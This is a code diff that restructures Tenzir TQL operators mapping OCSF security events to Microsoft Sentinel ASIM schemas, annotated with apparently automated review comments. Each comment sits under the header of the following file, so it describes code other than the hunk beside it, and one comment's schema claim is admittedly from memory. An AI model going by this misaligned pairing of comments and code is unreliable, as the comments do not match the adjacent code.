--- a/microsoft/operators/ocsf/asim/unsupported.tql
+++ b/microsoft/operators/asim/ocsf/helpers/unsupported.tql
@@ -1,5 +1,5 @@
 ---
-description: Drops unsupported OCSF → ASIM mappings with a warning.
+description: Drops unsupported OCSF -> ASIM mappings with a warning.
 ---
 
 assert false, message={
diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql
new file mode 100644
index 0000000..2a4b1e6
--- /dev/null
+++ b/microsoft/operators/asim/ocsf/http_activity.tql
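Review bot: finalize.tql's description says it "preserves the original OCSF event" but not where: `asim.AdditionalFields = {...this}` copies the complete input record — every OCSF attribute, including any bulky `unmapped` or raw payload the producer attached — into `AdditionalFields` of every ASIM event, so the output can be roughly twice the size of the input. Say so in the front matter, e.g. `description: Finalizes an initialized ASIM event; the complete original OCSF record (minus the asim working field) is kept in AdditionalFields.`, so a consumer sizing Sentinel ingestion is not surprised. Also worth one comment on `this = asim`: whether `@name`, set by the per-class operators, survives the replacement is not obvious from this file and the tests in this diff rely on it.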
@@ -0,0 +1,19 @@
+---
+description: OCSF HTTP Activity event -> Microsoft Sentinel ASIM WebSession.
+---
+
+microsoft::asim::ocsf::helpers::common
+
+@name = "asim.web_session"
+asim.EventSchema = "WebSession"
+asim.EventSchemaVersion = "0.2.7"
+asim.EventType = "HTTPsession"
+asim.Url = http_request?.url?.url_string?
+asim.HttpRequestMethod = http_request?.http_method? else activity_name?.to_upper()
+asim.EventResultDetails = http_response?.code?.string() else status_code?.string()
+if http_response?.code? != null {
+ asim.EventResult = "Success" if http_response.code < 400 else "Failure"
+}
+assert asim.Url != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
+
+microsoft::asim::ocsf::helpers::finalize
diff --git a/microsoft/operators/asim/ocsf/map.tql b/microsoft/operators/asim/ocsf/map.tql
new file mode 100644
index 0000000..e59945c
--- /dev/null
+++ b/microsoft/operators/asim/ocsf/map.tql
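Review bot: `asim.HttpRequestMethod = http_request?.http_method? else activity_name?.to_upper()` turns OCSF's catch-all activities `Unknown` and `Other` into `UNKNOWN`/`OTHER`, which are not HTTP methods and will pollute a field that WebSession parsers and detections key on. Restrict the fallback to the method-named activities, for instance `else (activity_name.to_upper() if activity_name in ["Connect", "Delete", "Get", "Head", "Options", "Post", "Put", "Trace"] else null)`, or a small `match`. Separately, `EventResult` is only decided when `http_response.code` is present; when only `status_code` exists the event carries the code in `EventResultDetails` but no outcome, which is fine if `helpers::common` fills EventResult from `status` but deserves a comment either way.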
@@ -0,0 +1,57 @@
+---
+description: Validated OCSF 1.8 event -> Microsoft Sentinel ASIM event.
+---
+
+match class_uid {
+ 2003 => {
+ microsoft::asim::ocsf::compliance_finding
+ }
+ 2004 => {
+ microsoft::asim::ocsf::detection_finding
+ }
+ 1006 => {
+ microsoft::asim::ocsf::scheduled_job_activity
+ }
+ 1008 => {
+ microsoft::asim::ocsf::event_log_activity
+ }
+ 3004 => {
+ microsoft::asim::ocsf::entity_management
+ }
+ 201004 => {
+ microsoft::asim::ocsf::windows_service_activity
+ }
+ 3002 => {
+ microsoft::asim::ocsf::authentication
+ }
+ 3003 => {
+ microsoft::asim::ocsf::authorize_session
+ }
+ 3001 => {
+ microsoft::asim::ocsf::account_change
+ }
+ 3006 => {
+ microsoft::asim::ocsf::group_management
+ }
+ 1007 => {
+ microsoft::asim::ocsf::process_activity
+ }
+ 1001 => {
+ microsoft::asim::ocsf::file_system_activity
+ }
+ 4001 => {
+ microsoft::asim::ocsf::network_activity
+ }
+ 4002 => {
+ microsoft::asim::ocsf::http_activity
+ }
+ 4003 => {
+ microsoft::asim::ocsf::dns_activity
+ }
+ 4004 => {
+ microsoft::asim::ocsf::dhcp_activity
+ }
+ _ => {
+ microsoft::asim::ocsf::helpers::unsupported
+ }
+}
diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql
new file mode 100644
index 0000000..1077e0f
--- /dev/null
+++ b/microsoft/operators/asim/ocsf/network_activity.tql
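Review bot: The dispatch arms are not in class_uid order (2003, 2004, 1006, 1008, 3004, 201004, 3002, ...) and nothing names the class behind each number, so a reader must cross-reference the OCSF catalogue to confirm that, say, `201004` is the Windows-extension service-activity class rather than a typo. Sort the arms numerically and annotate each with its class, e.g. `1001 => { // File System Activity`, which also makes an accidental duplicate arm stand out. This is style only; the `_ => { microsoft::asim::ocsf::helpers::unsupported }` fallback correctly prevents an unrecognised class from passing through half-mapped.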
@@ -0,0 +1,33 @@
+---
+description: OCSF Network Activity event -> Microsoft Sentinel ASIM NetworkSession.
+---
+
+microsoft::asim::ocsf::helpers::common
+
+@name = "asim.network_session"
+asim.EventSchema = "NetworkSession"
+asim.EventSchemaVersion = "0.2.7"
+asim.EventType = "NetworkSession"
+asim.EventType = "Flow" if activity_name == "Traffic" else asim.EventType
+asim.SrcIpAddr = src_endpoint?.ip?
+asim.SrcHostname = src_endpoint?.hostname?
+asim.SrcPortNumber = src_endpoint?.port?
+asim.DstIpAddr = dst_endpoint?.ip?
+asim.DstHostname = dst_endpoint?.hostname?
+asim.DstPortNumber = dst_endpoint?.port?
+asim.SrcBytes = traffic?.bytes_out?
+asim.DstBytes = traffic?.bytes_in?
+match disposition? {
+ "Allowed" => {
+ asim.DvcAction = "Allow"
+ asim.EventResult = "Success"
+ }
+ "Blocked" | "Denied" => {
+ asim.DvcAction = "Deny"
+ asim.EventResult = "Failure"
+ asim.EventSeverity = asim.EventSeverity? else "Low"
+ }
+ _ => {}
+}
+
+microsoft::asim::ocsf::helpers::finalize
diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql
new file mode 100644
index 0000000..6437521
--- /dev/null
+++ b/microsoft/operators/asim/ocsf/process_activity.tql
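Review bot: `match disposition?` recognises only `Allowed`, `Blocked` and `Denied`; the OCSF disposition enum also carries values such as `Dropped` and `Quarantined` (from memory — verify against the 1.8 schema), which fall through `_ => {}` and leave `DvcAction`/`EventResult` unset although they are clearly denied sessions. Add `"Dropped"` to the deny arm at minimum. The session's protocol and direction are also not carried: `connection_info.protocol_name` and `connection_info.direction`, when present, map onto ASIM `NetworkProtocol` and `NetworkDirection`, e.g. `asim.NetworkProtocol = connection_info?.protocol_name?.to_upper()` and `asim.NetworkDirection = connection_info?.direction?` once the value sets are reconciled (OCSF's `Lateral` has no ASIM counterpart).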
@@ -0,0 +1,31 @@
+---
+description: OCSF Process Activity event -> Microsoft Sentinel ASIM ProcessEvent.
+---
+
+microsoft::asim::ocsf::helpers::common
+
+@name = "asim.process_event"
+asim.EventSchema = "ProcessEvent"
+asim.EventSchemaVersion = "0.1.4"
+match activity_name {
+ "Launch" => { asim.EventType = "ProcessCreated" }
+ "Terminate" => { asim.EventType = "ProcessTerminated" }
+ _ => { microsoft::asim::ocsf::helpers::unsupported }
+}
+asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid?
+if actor?.user?.domain? != null and actor?.user?.name? != null {
+ asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}"
+ asim.ActorUsernameType = "Windows"
+}
+asim.ActorUserId = actor?.user?.uid?
+asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
+asim.ActingProcessId = actor?.process?.pid?.string() else process?.parent_process?.pid?.string() else process?.pid?.string()
+asim.ParentProcessId = actor?.process?.parent_process?.pid?.string()
+asim.TargetProcessId = process?.pid?.string()
+asim.TargetProcessName = process?.name? else process?.file?.name? else process?.path?.split("\\")[-1]
+asim.TargetProcessCommandLine = process?.cmd_line?
+asim.TargetUserId = user?.uid?
+assert asim.ActorUsername != null and asim.ActingProcessId != null and asim.TargetProcessId != null and asim.TargetProcessName != null and asim.TargetProcessCommandLine != null,
+ message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
+
+microsoft::asim::ocsf::helpers::finalize
diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql
new file mode 100644
index 0000000..09e300d
--- /dev/null
+++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql
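Review bot: The closing `assert` requires `asim.TargetProcessCommandLine != null` for `Terminate` as well as `Launch`, but process-termination records commonly carry no command line (Windows 4689, for one), so every `ProcessTerminated` event from such a source is dropped with an "insufficient OCSF fields" warning instead of mapped. Split the requirement, e.g. `assert asim.TargetProcessCommandLine != null or asim.EventType != "ProcessCreated", message={...}` as its own assert, keeping the command line mandatory only where ASIM requires it. Also, `asim.ActingProcessId` falls back to `process?.pid?` itself, so when neither the actor nor the parent is known ActingProcessId equals TargetProcessId; a comment such as `// Last resort: the target's own pid, so the assert below holds — not a parent/child relationship.` keeps a future reader from building parent-child logic on it.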
@@ -0,0 +1,40 @@
+---
+description: OCSF Scheduled Job Activity event -> Microsoft Sentinel ASIM AuditEvent.
+---
+
+microsoft::asim::ocsf::helpers::common
+
+@name = "asim.audit_event"
+asim.EventSchema = "AuditEvent"
+asim.EventSchemaVersion = "0.1.2"
+asim.EventType = "Other"
+match activity_name {
+ "Create" => { asim.EventType = "Create" }
+ "Read" => { asim.EventType = "Read" }
+ "Update" | "Set" => { asim.EventType = "Set" }
+ "Delete" => { asim.EventType = "Delete" }
+ "Execute" => { asim.EventType = "Execute" }
+ "Install" => { asim.EventType = "Install" }
+ "Clear" => { asim.EventType = "Clear" }
+ "Enable" => { asim.EventType = "Enable" }
+ "Disable" => { asim.EventType = "Disable" }
+ "Start" => { asim.EventType = "Start" }
+ "Stop" => { asim.EventType = "Stop" }
+ _ => {}
+}
+asim.Operation = activity_name? else type_name? else asim.EventType
+asim.Object = job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path?
+assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
+asim.ObjectType = "Scheduled Task"
+asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid?
+if actor?.user?.domain? != null and actor?.user?.name? != null {
+ asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}"
+ asim.ActorUsernameType = "Windows"
+}
+asim.ActorUserId = actor?.user?.uid?
+asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
+asim.SrcIpAddr = src_endpoint?.ip?
+asim.TargetHostname = dst_endpoint?.hostname?
+asim.TargetIpAddr = dst_endpoint?.ip?
+
+microsoft::asim::ocsf::helpers::finalize
diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql
new file mode 100644
index 0000000..0238afc
--- /dev/null
+++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql
@@ -0,0 +1,40 @@
+---
+description: OCSF Windows Service Activity event -> Microsoft Sentinel ASIM AuditEvent.
+---
+
+microsoft::asim::ocsf::helpers::common
+
+@name = "asim.audit_event"
+asim.EventSchema = "AuditEvent"
+asim.EventSchemaVersion = "0.1.2"
+asim.EventType = "Other"
+match activity_name {
+ "Create" => { asim.EventType = "Create" }
+ "Read" => { asim.EventType = "Read" }
+ "Update" | "Set" => { asim.EventType = "Set" }
+ "Delete" => { asim.EventType = "Delete" }
+ "Execute" => { asim.EventType = "Execute" }
+ "Install" => { asim.EventType = "Install" }
+ "Clear" => { asim.EventType = "Clear" }
+ "Enable" => { asim.EventType = "Enable" }
+ "Disable" => { asim.EventType = "Disable" }
+ "Start" => { asim.EventType = "Start" }
+ "Stop" => { asim.EventType = "Stop" }
+ _ => {}
+}
+asim.Operation = activity_name? else type_name? else asim.EventType
+asim.Object = job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path?
+assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
+asim.ObjectType = "Service"
+asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid?
+if actor?.user?.domain? != null and actor?.user?.name? != null {
+ asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}"
+ asim.ActorUsernameType = "Windows"
+}
+asim.ActorUserId = actor?.user?.uid?
+asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
+asim.SrcIpAddr = src_endpoint?.ip?
+asim.TargetHostname = dst_endpoint?.hostname?
+asim.TargetIpAddr = dst_endpoint?.ip?
+
+microsoft::asim::ocsf::helpers::finalize
diff --git a/microsoft/operators/ocsf/map.tql b/microsoft/operators/ocsf/map.tql
new file mode 100644
index 0000000..c1db810
--- /dev/null
+++ b/microsoft/operators/ocsf/map.tql
@@ -0,0 +1,15 @@
+---
+description: Microsoft event -> OCSF.
+args:
+ positional:
+ - name: log
+ description: The field that holds a raw Microsoft event, such as Windows Event Log XML.
+ default: null
+---
+
+if $log != null {
+ _microsoft_ocsf_log = $log
+ microsoft::windows::ocsf::map _microsoft_ocsf_log
+} else {
+ microsoft::graph::ocsf::map
+}
diff --git a/microsoft/operators/ocsf/map_to_asim.tql b/microsoft/operators/ocsf/map_to_asim.tql
deleted file mode 100644
index 78c01ef..0000000
--- a/microsoft/operators/ocsf/map_to_asim.tql
+++ /dev/null
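Review bot: `_microsoft_ocsf_log = $log` materialises the raw log as a field of the event before `microsoft::windows::ocsf::map _microsoft_ocsf_log` runs; unless that operator drops its argument field or replaces `this` wholesale (it is outside this diff, so I cannot tell), the unparsed Windows XML survives into the OCSF output as `_microsoft_ocsf_log`, duplicating the record and carrying whatever the raw event contained into every downstream consumer. If the callee does not already remove it, add `drop _microsoft_ocsf_log` after the call, and either way a comment on the temporary stating who owns its removal would settle the question. The description `Microsoft event -> OCSF.` could also say that with `log` absent the input is assumed to be Microsoft Graph JSON, since that is what the `else` branch encodes.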
@@ -1,344 +0,0 @@
----
-description: Validated OCSF 1.8 event → Microsoft Sentinel ASIM event.
----
-
-let $threat_categories = {
- adware: "Adware",
- cryptominer: "Cryptominor",
- malware: "Malware",
- phishing: "Phishing",
- ransomware: "Ransomware",
- rootkit: "Rootkit",
- spam: "Spam",
- spoofing: "Spoofing",
- spyware: "Spyware",
- trojan: "Trojan",
- virus: "Virus",
- worm: "Worm",
-}
-
-microsoft::ocsf::asim::common
-
-match class_uid {
- 2003 | 2004 => {
- @name = "asim.alert_event"
- asim.EventSchema = "AlertEvent"
- asim.EventSchemaVersion = "0.1"
- asim.EventType = "Alert"
- asim.EventUid = finding_info?.uid? else metadata?.original_event_uid?
- assert asim.EventUid != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
-
- asim.AlertName = finding_info?.title? else message?
- asim.EventReportUrl = finding_info?.url? else null
- asim.EventSubType = "Compliance Violation" if class_uid == 2003 else "Threat"
- asim.ThreatName = malware?[0]?.name? else finding_info?.title?
- if class_uid == 2003 {
- asim.ThreatCategory = "Security Policy Violation"
- } else {
- asim.ThreatCategory = $threat_categories[finding_info?.types?[0]?.to_lower()]?
- }
- asim.ThreatOriginalCategory = finding_info?.types?[0]?
- asim.Username = user?.email_addr? else user?.name? else actor?.user?.email_addr? else actor?.user?.name?
- asim.UserId = user?.uid? else actor?.user?.uid?
- asim.UserIdType = "SID" if (asim.UserId?.starts_with("S-") else false) else null
- match status? {
- "New" | "Active" | "In Progress" => {
- asim.AlertStatus = "Active"
- }
- "Resolved" | "Closed" => {
- asim.AlertStatus = "Closed"
- }
- _ => {}
- }
- asim.AlertOriginalStatus = status?
- match verdict? {
- "True Positive" => { asim.AlertVerdict = "True Positive" }
- "False Positive" => { asim.AlertVerdict = "False Positive" }
- "Benign" => { asim.AlertVerdict = "Benign Positive" }
- "Unknown" => { asim.AlertVerdict = "Unknown" }
- _ => {}
- }
- }
- 1006 | 1008 | 3004 | 201004 => {
- @name = "asim.audit_event"
- asim.EventSchema = "AuditEvent"
- asim.EventSchemaVersion = "0.1.2"
- asim.EventType = "Other"
- match activity_name {
- "Create" => { asim.EventType = "Create" }
- "Read" => { asim.EventType = "Read" }
- "Update" | "Set" => { asim.EventType = "Set" }
- "Delete" => { asim.EventType = "Delete" }
- "Execute" => { asim.EventType = "Execute" }
- "Install" => { asim.EventType = "Install" }
- "Clear" => { asim.EventType = "Clear" }
- "Enable" => { asim.EventType = "Enable" }
- "Disable" => { asim.EventType = "Disable" }
- "Start" => { asim.EventType = "Start" }
- "Stop" => { asim.EventType = "Stop" }
- _ => {}
- }
- asim.Operation = activity_name? else type_name? else asim.EventType
- asim.Object = job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path?
- assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
- match class_uid {
- 1006 => { asim.ObjectType = "Scheduled Task" }
- 1008 => { asim.ObjectType = "Event Log" }
- 3004 => { asim.ObjectType = "Directory Service Object" }
- 201004 => { asim.ObjectType = "Service" }
- _ => {}
- }
- asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid?
- if actor?.user?.domain? != null and actor?.user?.name? != null {
- asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}"
- asim.ActorUsernameType = "Windows"
- }
- asim.ActorUserId = actor?.user?.uid?
- asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
- asim.SrcIpAddr = src_endpoint?.ip?
- asim.TargetHostname = dst_endpoint?.hostname?
- asim.TargetIpAddr = dst_endpoint?.ip?
- }
- 3002 | 3003 => {
- @name = "asim.authentication"
- asim.EventSchema = "Authentication"
- asim.EventSchemaVersion = "0.1.4"
- match activity_name {
- "Logoff" => { asim.EventType = "Logoff" }
- _ => { asim.EventType = "Elevate" if class_uid == 3003 else "Logon" }
- }
- match logon_type? {
- "System" => { asim.EventSubType = "System" }
- "Interactive" | "Cached Interactive" | "Unlock" | "Cached Unlock" => {
- asim.EventSubType = "Interactive"
- }
- "Network" | "Network Cleartext" => { asim.EventSubType = "Remote" }
- "Remote Interactive" | "Cached Remote Interactive" => {
- asim.EventSubType = "RemoteInteractive"
- }
- "OS Service" => { asim.EventSubType = "Service" }
- _ => {}
- }
- if logon_type? != null {
- asim.EventOriginalSubType = logon_type
- }
- asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid?
- if actor?.user?.domain? != null and actor?.user?.name? != null {
- asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}"
- asim.ActorUsernameType = "Windows"
- }
- asim.ActorUserId = actor?.user?.uid?
- asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
- asim.ActorSessionId = actor?.session?.uid? else actor?.session?.uid_alt?
- asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid?
- if user?.domain? != null and user?.name? != null {
- asim.TargetUsername = f"{user.domain}\\{user.name}"
- asim.TargetUsernameType = "Windows"
- asim.TargetDomain = user.domain
- asim.TargetDomainType = "Windows"
- }
- asim.TargetUserId = user?.uid?
- asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null
- asim.TargetSessionId = session?.uid? else session?.uid_alt?
- asim.SrcIpAddr = src_endpoint?.ip?
- asim.SrcHostname = src_endpoint?.hostname?
- asim.SrcPortNumber = src_endpoint?.port?
- asim.TargetHostname = dst_endpoint?.hostname? else device?.hostname?
- asim.TargetAppId = service?.uid? else dst_endpoint?.uid?
- asim.TargetAppName = service?.name? else dst_endpoint?.svc_name?
- asim.LogonProtocol = auth_protocol?
- if auth_factors? != null {
- asim.LogonMethod = auth_factors[0]?.factor_type?
- }
- }
- 3001 | 3006 => {
- @name = "asim.user_management"
- asim.EventSchema = "UserManagement"
- asim.EventSchemaVersion = "0.1.2"
- asim.EventSeverity = asim.EventSeverity? else "Informational"
- asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid?
- if actor?.user?.domain? != null and actor?.user?.name? != null {
- asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}"
- asim.ActorUsernameType = "Windows"
- }
- assert asim.ActorUsername != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
- asim.ActorUserId = actor?.user?.uid?
- asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
-
- if class_uid == 3001 {
- match activity_name {
- "Create" => { asim.EventType = "UserCreated" }
- "Delete" => { asim.EventType = "UserDeleted" }
- "Update" => { asim.EventType = "UserModified" }
- "Lock" => { asim.EventType = "UserLocked" }
- "Unlock" => { asim.EventType = "UserUnlocked" }
- "Disable" => { asim.EventType = "UserDisabled" }
- "Enable" => { asim.EventType = "UserEnabled" }
- "Password Change" => { asim.EventType = "PasswordChanged" }
- "Password Reset" => { asim.EventType = "PasswordReset" }
- _ => { asim.EventType = "UserModified" }
- }
- } else {
- match activity_name {
- "Create" => { asim.EventType = "GroupCreated" }
- "Delete" => { asim.EventType = "GroupDeleted" }
- "Add User" => { asim.EventType = "UserAddedToGroup" }
- "Remove User" => { asim.EventType = "UserRemovedFromGroup" }
- "Read" => { asim.EventType = "GroupRead" }
- _ => { asim.EventType = "GroupModified" }
- }
- }
-
- asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid?
- if user?.domain? != null and user?.name? != null {
- asim.TargetUsername = f"{user.domain}\\{user.name}"
- asim.TargetUsernameType = "Windows"
- }
- asim.TargetUserId = user?.uid?
- asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null
- asim.GroupName = group?.name?
- asim.GroupId = group?.uid?
- asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else null
- asim.SrcIpAddr = src_endpoint?.ip?
- asim.SrcHostname = src_endpoint?.hostname?
- }
- 1007 => {
- @name = "asim.process_event"
- asim.EventSchema = "ProcessEvent"
- asim.EventSchemaVersion = "0.1.4"
- match activity_name {
- "Launch" => { asim.EventType = "ProcessCreated" }
- "Terminate" => { asim.EventType = "ProcessTerminated" }
- _ => { microsoft::ocsf::asim::unsupported }
- }
- asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid?
- if actor?.user?.domain? != null and actor?.user?.name? != null {
- asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}"
- asim.ActorUsernameType = "Windows"
- }
- asim.ActorUserId = actor?.user?.uid?
- asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
- asim.ActingProcessId = actor?.process?.pid?.string() else process?.parent_process?.pid?.string() else process?.pid?.string()
- asim.ParentProcessId = actor?.process?.parent_process?.pid?.string()
- asim.TargetProcessId = process?.pid?.string()
- asim.TargetProcessName = process?.name? else process?.file?.name? else process?.path?.split("\\")[-1]
- asim.TargetProcessCommandLine = process?.cmd_line?
- asim.TargetUserId = user?.uid?
- assert asim.ActorUsername != null and asim.ActingProcessId != null and asim.TargetProcessId != null and asim.TargetProcessName != null and asim.TargetProcessCommandLine != null,
- message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
- }
- 1001 => {
- @name = "asim.file_event"
- asim.EventSchema = "FileEvent"
- asim.EventSchemaVersion = "0.2.2"
- match activity_name {
- "Create" => { asim.EventType = "FileCreated" }
- "Read" | "Open" => { asim.EventType = "FileAccessed" }
- "Update" | "Set Attributes" | "Set Security" => { asim.EventType = "FileModified" }
- "Delete" => { asim.EventType = "FileDeleted" }
- "Rename" => { asim.EventType = "FileRenamed" }
- _ => { asim.EventType = "FileCreatedOrModified" }
- }
- asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid?
- if actor?.user?.domain? != null and actor?.user?.name? != null {
- asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}"
- asim.ActorUsernameType = "Windows"
- }
- asim.ActorUserId = actor?.user?.uid?
- asim.TargetFilePath = file?.path? else file?.name?
- asim.TargetFileName = file?.name? else asim.TargetFilePath?.split("\\")[-1]
- if activity_name == "Rename" and file_result? != null {
- asim.SrcFilePath = asim.TargetFilePath
- asim.SrcFileName = asim.TargetFileName
- asim.SrcFilePathType = "Windows Local" if (asim.SrcFilePath?.contains("\\") else false) else "Unix Local"
- asim.TargetFilePath = file_result.path? else asim.TargetFilePath
- asim.TargetFileName = file_result.name? else asim.TargetFileName
- }
- asim.TargetFilePathType = "Windows Local" if (asim.TargetFilePath?.contains("\\") else false) else "Unix Local"
- assert asim.ActorUsername != null and asim.TargetFilePath != null,
- message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
- }
- 4001 => {
- @name = "asim.network_session"
- asim.EventSchema = "NetworkSession"
- asim.EventSchemaVersion = "0.2.7"
- asim.EventType = "NetworkSession"
- asim.EventType = "Flow" if activity_name == "Traffic" else asim.EventType
- asim.SrcIpAddr = src_endpoint?.ip?
- asim.SrcHostname = src_endpoint?.hostname?
- asim.SrcPortNumber = src_endpoint?.port?
- asim.DstIpAddr = dst_endpoint?.ip?
- asim.DstHostname = dst_endpoint?.hostname?
- asim.DstPortNumber = dst_endpoint?.port?
- asim.SrcBytes = traffic?.bytes_out?
- asim.DstBytes = traffic?.bytes_in?
- match disposition? {
- "Allowed" => {
- asim.DvcAction = "Allow"
- asim.EventResult = "Success"
- }
- "Blocked" | "Denied" => {
- asim.DvcAction = "Deny"
- asim.EventResult = "Failure"
- asim.EventSeverity = asim.EventSeverity? else "Low"
- }
- _ => {}
- }
- }
- 4002 => {
- @name = "asim.web_session"
- asim.EventSchema = "WebSession"
- asim.EventSchemaVersion = "0.2.7"
- asim.EventType = "HTTPsession"
- asim.Url = http_request?.url?.url_string?
- asim.HttpRequestMethod = http_request?.http_method? else activity_name?.to_upper()
- asim.EventResultDetails = http_response?.code?.string() else status_code?.string()
- if http_response?.code? != null {
- asim.EventResult = "Success" if http_response.code < 400 else "Failure"
- }
- assert asim.Url != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
- }
- 4003 => {
- @name = "asim.dns"
- asim.EventSchema = "Dns"
- asim.EventSchemaVersion = "0.1.7"
- asim.EventType = query?.opcode? else "Query"
- match activity_name {
- "Query" => { asim.EventSubType = "request" }
- "Response" => { asim.EventSubType = "response" }
- _ => {}
- }
- asim.DnsQuery = query?.hostname?
- asim.DnsQueryTypeName = query?.type?
- asim.DnsQueryClassName = query?.class?
- asim.EventResultDetails = rcode? else "NA"
- asim.SrcIpAddr = src_endpoint?.ip?
- asim.SrcHostname = src_endpoint?.hostname?
- asim.DstIpAddr = dst_endpoint?.ip?
- asim.DstHostname = dst_endpoint?.hostname?
- assert asim.DnsQuery != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
- }
- 4004 => {
- @name = "asim.dhcp_event"
- asim.EventSchema = "DhcpEvent"
- asim.EventSchemaVersion = "0.1.1"
- match activity_name {
- "Ack" | "Offer" => { asim.EventType = "Assign" }
- "Request" => { asim.EventType = "Renew" }
- "Release" => { asim.EventType = "Release" }
- _ => { asim.EventType = "Assign" }
- }
- asim.SrcHostname = src_endpoint?.hostname? else src_endpoint?.ip?.string()
- asim.SrcIpAddr = src_endpoint?.ip?
- asim.SrcMacAddr = src_endpoint?.mac?
- assert asim.SrcHostname != null and asim.SrcIpAddr != null and asim.SrcMacAddr != null,
- message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
- }
- _ => {
- microsoft::ocsf::asim::unsupported
- }
-}
-
-asim.AdditionalFields = {...this}
-drop asim.AdditionalFields.asim
-this = asim
diff --git a/microsoft/package.yaml b/microsoft/package.yaml
index 1f0a45e..46b3e8e 100644
--- a/microsoft/package.yaml
+++ b/microsoft/package.yaml
@@ -11,7 +11,8 @@ description: |
 telemetry and log formats. This package provides operators that parse Microsoft product logs, collect
- Microsoft Graph telemetry, and map them to OCSF. The package covers native
+ Microsoft Graph telemetry, and map them to OCSF and Microsoft Sentinel ASIM.
+ The package covers native
 [Windows Event Log](https://learn.microsoft.com/en-us/windows/win32/wes/windows-event-log) events from the Application, Security, and System channels, and Microsoft Graph endpoints for Entra ID sign-ins and directory audits, Defender alerts
@@ -20,4 +21,3 @@ description: | categories: - mappings - sources -
diff --git a/microsoft/tests/asim/graph.tql b/microsoft/tests/asim/graph.tql
new file mode 100644
index 0000000..70141d8
--- /dev/null
+++ b/microsoft/tests/asim/graph.tql
@@ -0,0 +1,11 @@
+from_file f"{env("TENZIR_INPUTS")}/graph/sign-ins.ndjson" {
+ read_json
+}
+@name = "microsoft.graph.sign_in"
+microsoft::asim::map
+name = @name
+sort EventOriginalUid
+select name, EventSchema, EventSchemaVersion, EventType,
+ EventResult, EventProduct, EventVendor, EventOriginalType,
+ EventOriginalUid, Dvc, SrcIpAddr=SrcIpAddr?,
+ TargetUsername, TargetUserId, TargetAppName=TargetAppName?
diff --git a/microsoft/tests/asim/graph.txt b/microsoft/tests/asim/graph.txt
